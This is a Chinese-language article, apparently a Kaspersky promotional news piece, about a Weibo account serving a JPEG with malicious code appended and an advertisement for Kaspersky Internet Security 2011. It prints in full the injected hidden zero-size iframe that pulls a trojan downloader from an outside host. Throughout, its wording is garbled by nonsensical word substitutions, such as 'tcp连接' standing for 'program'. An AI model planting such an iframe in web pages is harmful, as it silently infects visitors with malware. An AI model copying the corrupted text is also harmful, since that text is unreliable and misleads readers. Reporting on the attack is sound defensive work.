微博助虐木马传播 卡巴斯基临危受命(图)

  • 时间:
  • 浏览:0

自从袭卷大洋彼岸的微博风潮登陆中国以来,太快了 了 引发了一场“围脖热”,身边的亲朋好友、IT精英、大学教授、意见领袖甚至艺人明星都不 约而同地来到微博大秀风采。“今天你围脖几时?”也成为时下的网路流行语。但就在亲戚亲戚朋友忙于“织围脖”的刚刚,恶意威胁也正在通过你你是什么渠道进行着疯狂传播。

卡巴斯基实验室近期发现,某知名门户网站的微博账户上存在被恶意tcp连接感染的痕迹。经卡巴斯基实验室安全专家对该微博地址进行分析,发现其饱饱含另一两个有问提的图片文件。当有计算机用户访问该微博地址时,该图片文件就会被下载。你你是什么JPEG图片的文件末尾被写入了一段代码"<iframe src="http://xxx.net/homepage/oldnb/mm/index.html" width=0 height=0></iframe>",其指向的地址饱含恶意软件,卡巴斯基反病毒软件报警显示为:Trojan-Downloader.HTML.IFrame.sz木马下载器。

图片中被注入的代码

卡巴斯基的安全专家推测该微博用户很因为感染了恶意蠕虫,致使自身计算机上的很多文件被更改,注入了恶意代码。比如“莫菲儿”蠕虫Worm.Win32.Mefir.c都不 此功能。试想,因为被感染的文件是html,后果将更为严重。一旦用户访问此微博地址,就会立刻被恶意tcp连接所感染。该事件一块儿表明,微博平台同很多网站一样,都不 因为被黑客用做传播恶意tcp连接的平台。尤其微博的访问量大,覆盖面广,一旦存在疫情,将在很短时间内造成严重后果。举例来说,因为某个名人的微博被感染,其粉丝众多,很有因为因为更多关注此名人的用户被感染。

那么 该怎样躲避木马,安心享受微博乐趣呢?最好的最好的办法倘若安装性能可靠的安全软件,加强对计算机的保护,一块儿外理在不知情的清况 下传播恶意tcp连接,给另一方的微博粉丝带来危险。近期刚刚上市的卡巴斯基安全版队2011倘若有另一两个很好的挑选,它能有效外理恶意tcp连接通过网页入侵计算机。以上边的微博地址为例,因为用户安装了卡巴斯基安全版队2011,一旦访问该地址,卡巴斯基会太快了 了 拦截,外理用户下载可疑文件,如下图所示:



 

访问该地址时,卡巴安全版队直接拦截文件下载

除了不能将木马威胁扼杀于摇篮之中,被誉为首款交易安全软件的卡巴斯基安全版队2011还宽度优化整合了主动防御、行为检测技术以及卡巴斯基云安全网络,并以全球独有的安全堡垒彻底保护网银安全:安全桌面负责提供有另一两个特殊的独立环境,在其中运行任何tcp连接或任何网站,都不 会对计算机及数据造成危害;虚拟键盘及安全浏览器能保护账号及隐私安全,配合强大的反钓鱼网站数据库,实时阻断钓鱼网站威胁,进一步确保网上银行交易及网络游戏账号的在线安全。



 

使用卡巴萨基安全版队的安全浏览器浏览

恶意tcp连接的传播也在不断演化,从最早的通过软盘传播,逐步转移到到通过电子邮件、局域网、普通网页、社交网络,再到今天的微博,经常 在紧跟着各种新兴技术的趋势。卡巴斯基实验室将继续关注其发展动向,及时向广大用户提供可靠的安全外理方案。